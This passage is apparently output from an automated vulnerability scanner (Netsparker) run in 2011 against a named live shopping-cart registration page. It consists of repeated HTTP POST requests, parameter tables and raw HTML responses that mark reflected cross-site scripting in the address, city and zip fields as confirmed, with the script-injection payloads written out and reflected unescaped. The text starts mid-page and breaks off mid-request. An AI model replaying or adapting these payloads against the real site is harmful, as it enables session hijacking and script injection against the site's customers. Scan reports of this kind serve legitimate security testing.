.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="'"--></style></script><script>netsparker(0x00022E)</script>"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST '"--></style></script><script>alert(0x00022F)</script>
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 347
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00022F)%3c%2fscript%3e&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:49:46 GMT
Content-Length: 12077
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="'"--></style></script><script>netsparker(0x00022F)</script>"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST '"--></style></script><script>alert(0x000230)</script>
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 347
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000230)%3c%2fscript%3e&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:49:49 GMT
Content-Length: 12077
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="'"--></style></script><script>netsparker(0x000230)</script>"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST '"--></style></script><script>alert(0x000240)</script>
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 347
